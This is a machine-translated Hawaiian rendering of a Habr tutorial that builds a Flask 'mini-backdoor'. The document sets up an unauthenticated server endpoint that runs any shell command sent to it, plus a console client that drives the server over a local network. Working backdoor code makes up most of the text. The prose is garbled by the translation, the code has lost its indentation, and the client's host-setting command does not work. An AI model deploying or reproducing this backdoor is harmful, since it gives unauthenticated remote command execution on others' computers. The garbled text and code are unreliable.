E Habr!
Ua nānā au i kahi mana i hoʻoiho ʻia o ke kahawai papahana "Pehea e hana ai i kāu noi pūnaewele ponoʻī ma Flask." A ua hoʻoholo wau e hoʻohui i koʻu ʻike ma kekahi papahana. No ka manawa lōʻihi ʻaʻole wau i ʻike i ka mea e kākau ai a hiki mai ka manaʻo iaʻu: "No ke aha e hana ʻole ai i kahi mini-backdoor ma Flask?"
Ua ʻike koke ʻia nā koho mua no ka hoʻokō a me nā hiki o ka backdoor i koʻu poʻo. Akā ua hoʻoholo wau e hana koke i kahi papa inoa o nā mea hiki i hope:
- E ʻike pehea e wehe ai i nā pūnaewele
- Loaʻa i ka laina kauoha
- Hiki iā ʻoe ke wehe i nā polokalamu, nā kiʻi, nā wikiō
No laila, maʻalahi loa ka helu mua e hoʻokō me ka hoʻohana ʻana i ka module webbrowser. Ua hoʻoholo wau e hoʻokō i ka helu ʻelua me ka hoʻohana ʻana i ka module os. A ʻo ke kolu hoʻi ma o ka os module, akā e hoʻohana wau i "nā loulou" (ʻoi aʻe ma ia hope).
Ke kākau ʻana i kahi kikowaena
No laila, *drumroll* nā code server a pau:
from flask import Flask, request
import webbrowser
import os
import re
app = Flask(__name__)
@app.route('/mycomp', methods=['POST'])
def hell():
json_string = request.json
if json_string['command'] == 'test':
return 'The server is running and waiting for commands...'
if json_string['command'] == 'openweb':
webbrowser.open(url='https://www.'+json_string['data'], new=0)
return 'Site opening ' + json_string['data'] + '...'
if json_string['command'] == 'shell':
os.system(json_string['data'])
return 'Command execution ' + json_string['data'] + '...'
if json_string['command'] == 'link':
links = open('links.txt', 'r')
for i in range(int(json_string['data'])):
link = links.readline()
os.system(link.split('>')[0])
return 'Launch ' + link.split('>')[1]
if __name__ == '__main__':
app.run(host='0.0.0.0')
Ua hoʻolei au i nā code āpau, ʻo ia ka manawa e wehewehe ai i ke ʻano.
Holo nā code āpau ma ka kamepiula kūloko ma ke awa 5000. No ka launa pū me ke kikowaena, pono mākou e hoʻouna i kahi noi JSON POST.
Ka hoʻolālā noi JSON:
{‘command’: ‘comecommand’, ‘data’: ‘somedata’}
ʻAe, he mea kūpono ʻo 'kauoha' ke kauoha a mākou e makemake ai e hoʻokō. A ʻo 'data' nā manaʻo hoʻopaʻapaʻa kauoha.
Hiki iā ʻoe ke kākau a hoʻouna i nā noi JSON e launa pū me ka server me ka lima (e kōkua nā noi iā ʻoe). A i ʻole hiki iā ʻoe ke kākau i kahi mea kūʻai console.
Ke kākau ʻana i kahi mea kūʻai aku
Kuhikuhi:
import requests
logo = ['nn',
'****** ********',
'******* *********',
'** ** ** **',
'** ** ** ** Written on Python',
'******* ** **',
'******** ** **',
'** ** ** ** Author: ROBOTD4',
'** ** ** **',
'** ** ** **',
'******** *********',
'******* ********',
'nn']
p = ''
iport = '192.168.1.2:5000'
host = 'http://' + iport + '/mycomp'
def test():
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
def start():
for i in logo:
print(i)
start()
test()
while True:
command = input('>')
if command == '':
continue
a = command.split()
if command == 'test':
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
if a[0] == 'shell':
for i in range(1, len(a)):
p = p + a[i] + ' '
dict = {'command': 'shell', 'data': p}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
p = ''
if a[0] == 'link':
if len(a) > 1:
dict = {'command': 'link', 'data': int(a[1])}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'openweb':
if len(a) > 1:
dict = {'command': 'openweb', 'data': a[1]}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'set':
if a[1] == 'host':
ip = a[2] + ':5000'
if command == 'quit':
break
Nā wehewehe:
ʻO ka mea mua, lawe ʻia ka module noi (no ka launa pū ʻana me ke kikowaena). Aia ma lalo nā wehewehe o ka hoʻomaka a me nā hana hoʻāʻo. A laila ka pōʻaiapuni kahi e hana ai ke kilokilo. Ua heluhelu ʻoe i ke code? No laila maopopo iā ʻoe ke ʻano o ka hana kilokilo i hana ʻia i ka pōʻai. E hoʻokomo i ke kauoha - ua hoʻokō ʻia. Shell - nā kauoha no ka laina kauoha (ʻaʻole ka pālākiō).
E ho'āʻo - e nānā inā e holo ana ke kikowaena (puka hope)
Link - hoʻohana i kahi "pōkole"
Openweb - wehe i kahi pūnaewele
Haʻalele - haʻalele i ka mea kūʻai aku
Hoʻonohonoho - hoʻonohonoho i ka ip o kāu kamepiula ma ka pūnaewele kūloko
A i kēia manawa e pili ana i ka loulou.
Aia kahi faila link.txt ma hope o ke kikowaena. Loaʻa iā ia nā loulou (ala piha) i nā faila (wikiō, kiʻi, papahana).
Penei ka hale:
полный_путь>описание
полный_путь>описание
ʻO ka hopena
Loaʻa iā mākou kahi kikowaena backdoor no ka mālama ʻana i kahi kamepiula ma kahi pūnaewele kūloko (i loko o kahi pūnaewele wi-fi). Ma keʻano loea, hiki iā mākou ke holo i ka mea kūʻai mai kekahi mea i loaʻa kahi unuhi ʻōlelo python.
PS Ua hoʻohui au i ke kauoha i hoʻonohonoho ʻia inā hāʻawi ʻia kahi kamepiula ma ka pūnaewele kūloko i kahi IP ʻē aʻe, hiki ke hoʻololi pololei i ka mea kūʻai.
Source: www.habr.com